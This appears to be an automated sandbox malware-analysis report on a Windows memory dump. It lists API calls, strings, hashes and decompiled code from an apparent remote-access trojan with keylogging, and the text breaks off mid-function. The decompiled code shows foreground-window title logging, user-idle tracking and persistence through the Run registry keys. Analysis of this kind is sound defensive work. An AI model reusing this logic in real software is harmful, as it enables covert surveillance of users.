                                        • GetProcAddress.KERNEL32(00000000), ref: 00409A24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule$LibraryLoad
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                        • API String ID: 551388010-2914448473
                                        • Opcode ID: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                        • Instruction ID: 4c9355c828fc4da35060c465c8423d7dda30a1a04bb52c9e9a5aad065eac730d
                                        • Opcode Fuzzy Hash: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                        • Instruction Fuzzy Hash: F721AFB0E81358B9DA206BB56C4EFDB7E59DA94B54323442BB40893194EFBCC480CEDC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00413626
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 0041365D
                                        • _wgetenv.MSVCRT ref: 0041366D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00413678
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00413683
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041368F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413698
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136A1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136AA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 004136BE
                                        • _wgetenv.MSVCRT ref: 004136CE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004136D9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004136E4
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004136F0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136F9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413702
                                        • _wgetenv.MSVCRT ref: 00413720
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 0041372B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,0041BCB0), ref: 00413741
                                        • GetLongPathNameW.KERNELBASE(00000000), ref: 00413748
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041375A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415A24,?,00000000), ref: 0041376D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 00413783
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041378E
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041379A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137A5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137AE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137B7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                        • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                        • API String ID: 1999370131-1609423294
                                        • Opcode ID: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                        • Instruction ID: 55aa70349295c49f58eee01d6a61984d570a68084dfe302b191afe96af195224
                                        • Opcode Fuzzy Hash: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                        • Instruction Fuzzy Hash: 4451FCB280150EEBCB05DF90ED59DEEB778EF54345B208066F912E3090EB746B49CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • Sleep.KERNELBASE(00002710), ref: 00405607
                                          • Part of subcall function 00405532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                          • Part of subcall function 00405532: CreateFileW.KERNELBASE(00000000), ref: 00405569
                                          • Part of subcall function 00405532: GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                          • Part of subcall function 00405532: Sleep.KERNEL32(00002710), ref: 004055A7
                                          • Part of subcall function 00405532: FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055AE
                                          • Part of subcall function 00405532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405619
                                        • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040562E
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040563F
                                        • CreateDirectoryW.KERNELBASE(00000000), ref: 00405646
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00405651
                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 00405658
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00405669
                                        • SetFileAttributesW.KERNELBASE(00000000), ref: 00405670
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405681
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 00405690
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040569D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056AA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004056C5
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004056D0
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056DC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004056F0
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 004056F7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405708
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405714
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405729
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040574D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405756
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405733
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040575F
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040576F
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405778
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405782
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040579A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004057AA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057BB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057C4
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 004057D1
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 004057E2
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 004057F1
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 004057F8
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@ChangeCloseD@2@@0@DirectoryExistsFindNotificationPathSizeV?$basic_string@Y?$basic_string@
                                        • String ID:
                                        • API String ID: 131886942-0
                                        • Opcode ID: 117214ba82af0f903fc6147f38b9d825f59407b045661cc97377ae59eabf001a
                                        • Instruction ID: c86808d706488c02b7588af0601caf96bbb35f31f7bc76b7b462248bc21621a9
                                        • Opcode Fuzzy Hash: 117214ba82af0f903fc6147f38b9d825f59407b045661cc97377ae59eabf001a
                                        • Instruction Fuzzy Hash: B0514E72A00909EBCB05ABA0ED5DADE7B78EF84315F04807AF503A71A0DF745A45CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E004059BE(intOrPtr __ecx) {
                                        				char _v5;
                                        				char _v6;
                                        				char _v7;
                                        				intOrPtr _v12;
                                        				signed int _v16;
                                        				char _v28;
                                        				char _v44;
                                        				char _v60;
                                        				char _v76;
                                        				void* _v92;
                                        				intOrPtr _t41;
                                        				struct HWND__* _t42;
                                        				int _t43;
                                        				CHAR* _t45;
                                        				signed int _t48;
                                        				char* _t58;
                                        				char* _t59;
                                        				struct HWND__* _t93;
                                        				intOrPtr _t94;
                                        				void* _t99;
                                        				intOrPtr _t112;
                                        
                                        				_v12 = __ecx;
                                        				while(1) {
                                        					_t41 = _v12;
                                        					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
                                        						break;
                                        					}
                                        					if(( *0x41b990 & 0x00000001) == 0) {
                                        						 *0x41b990 =  *0x41b990 | 0x00000001;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                        						E00413E72(E00405BB5);
                                        					}
                                        					Sleep(0x1f4); // executed
                                        					_t42 = GetForegroundWindow(); // executed
                                        					_t93 = _t42;
                                        					_t43 = GetWindowTextLengthA(_t93);
                                        					_t95 = _t43;
                                        					_t9 = _t95 + 1; // 0x1
                                        					_t45 = _t9;
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);
                                        					if(_t43 != 0) {
                                        						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        						GetWindowTextA(_t93, _t45, _t45);
                                        						_t58 =  &_v44;
                                        						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58,  &E0041B998);
                                        						if(_t58 == 0) {
                                        							_t59 =  &_v44;
                                        							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);
                                        							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);
                                        							_t112 =  *0x41b93e; // 0x0
                                        							if(_t112 == 0) {
                                        								_t103 = _t99 - 0x10;
                                        								L00414176();
                                        								L00414170();
                                        								_t99 = _t99 - 0x10 + 0x18;
                                        								E004054E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
                                        								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
                                        							} else {
                                        								_t99 = _t99 - 0x10;
                                        								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        								E00405DD3(_v12,  &_v44);
                                        							}
                                        						}
                                        					}
                                        					_t94 = _v12;
                                        					_t71 = _t94; // executed
                                        					E00406C35(_t94); // executed
                                        					if(E0041269B(_t94) < 0xea60) {
                                        						L16:
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						continue;
                                        					} else {
                                        						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
                                        							_t48 = E0041269B(_t71);
                                        							if(_t48 < 0xea60) {
                                        								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
                                        								_t101 = _t99 + 0xc - 0x10;
                                        								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
                                        								L00414176();
                                        								L00414170();
                                        								_t99 = _t99 + 0xc - 0x10 + 0x18;
                                        								E004054E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
                                        								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        								goto L16;
                                        							}
                                        							_v16 = _t48;
                                        							Sleep(0x3e8);
                                        						}
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						break;
                                        					}
                                        				}
                                        				return 0;
                                        			}

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004059F6
                                        • Sleep.KERNELBASE(000001F4), ref: 00405A0C
                                        • GetForegroundWindow.USER32 ref: 00405A12
                                        • GetWindowTextLengthA.USER32(00000000), ref: 00405A1B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00405A2F
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A40
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405A4A
                                        • GetWindowTextA.USER32 ref: 00405A52
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B998), ref: 00405A61
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00405A76
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A7F
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00405A8A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405AA1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 00405AC9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 00405AD3
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                          • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                          • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405AE6
                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 00405B27
                                        • _itoa.MSVCRT ref: 00405B3D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B5C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B6C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405B76
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B88
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B91
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B9A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405BA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                        • String ID: [ ${ User has been idle for $ ]$ minutes }
                                        • API String ID: 615312007-3343415809
                                        • Opcode ID: 0e15a73bea33ccb5e514cff3bf8d1caab7dc6e5c798de36ef3d90741790d0d5c
                                        • Instruction ID: 24516c956339191e20f1f3c27382aafae9a0e704c06eebb7e5bf761840e1d674
                                        • Opcode Fuzzy Hash: 0e15a73bea33ccb5e514cff3bf8d1caab7dc6e5c798de36ef3d90741790d0d5c
                                        • Instruction Fuzzy Hash: CC517072900609EBCB00EBA0DC899EF7F78EF44315F04407AE502E7191EB785989CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 00409D63
                                          • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                          • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                          • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409D96
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409DB3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409DC6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409DDC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409DE5
                                        • Sleep.KERNELBASE(00000BB8), ref: 00409DFA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409E11
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409E2E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409E41
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409E57
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409E60
                                        • exit.MSVCRT ref: 00409E77
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                        • String ID: 2.7.2 Pro$override$pth_unenc
                                        • API String ID: 3602623569-3893205188
                                        • Opcode ID: 24e136f94a58c62363002b572ecda5687b4239bdf0234719c2167b28e35c3464
                                        • Instruction ID: 2889bc0b5ca8399aadfd957be20fb2b9bea035d2a19627ad42be5e9aadac3fca
                                        • Opcode Fuzzy Hash: 24e136f94a58c62363002b572ecda5687b4239bdf0234719c2167b28e35c3464
                                        • Instruction Fuzzy Hash: 2E31B772A50604BBD70477E59C4AEFE776DEF84740F44002AF911971D1DFB8498187AE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
                                        				char _v20;
                                        				void* _t13;
                                        				void* _t15;
                                        				char* _t26;
                                        				void* _t27;
                                        				void* _t32;
                                        				void* _t35;
                                        
                                        				_t26 = "\"";
                                        				if(_a4 == 1) {
                                        					_t35 = _t27 - 0x10;
                                        					L0041416A();
                                        					L00414146();
                                        					_t3 =  &_a16; // 0x415a24
                                        					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28); // executed
                                        					_t27 = _t35 + 0x38;
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                        				}
                                        				if(_a8 == 1) {
                                        					_t32 = _t27 - 0x10;
                                        					L0041416A();
                                        					L00414146();
                                        					_t7 =  &_a16; // 0x415a24
                                        					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);
                                        					_t27 = _t32 + 0x38;
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                        				}
                                        				if(_a12 == 1) {
                                        					L0041416A();
                                        					L00414146();
